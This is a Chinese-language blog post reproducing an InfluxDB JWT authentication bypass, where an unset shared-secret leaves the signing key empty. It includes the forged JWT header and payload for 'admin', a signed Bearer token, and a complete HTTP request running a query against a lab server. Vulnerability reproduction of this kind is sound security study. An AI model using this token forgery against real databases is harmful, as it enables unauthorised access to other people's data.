joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

influxdb未授权访问漏洞

发表于 2021-08-16 | 分类于漏洞复现 |

influxdb未授权访问漏洞

influxdb是一款著名的时序数据库，其使用jwt作为鉴权方式。在用户开启了认证，但未设置参数shared-secret的情况下，jwt的认证密钥为空字符串，此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。

参考链接：

漏洞复现

环境启动后，访问http://192.168.44.132:8086/debug/vars即可查看一些服务信息，但此时执行SQL语句则会出现401错误：

我们借助https://jwt.io/来生成jwt token：

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "username": "admin",
  "exp": 1676346267
}

其中，admin是一个已经存在的用户，exp是一个时间戳，代表着这个token的过期时间，你需要设置为一个未来的时间戳。

最终生成的token：

发送带有这个jwt token的数据包，可见SQL语句执行成功：

POST /query HTTP/1.1
Host: 192.168.44.132
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjI5MTY5NTg4fQ.pSTpKw7rLIrn5Q5Lw-bFsYlSsR0Eq3hr7v-Ur0jpIg0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/08/16/influxdb%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%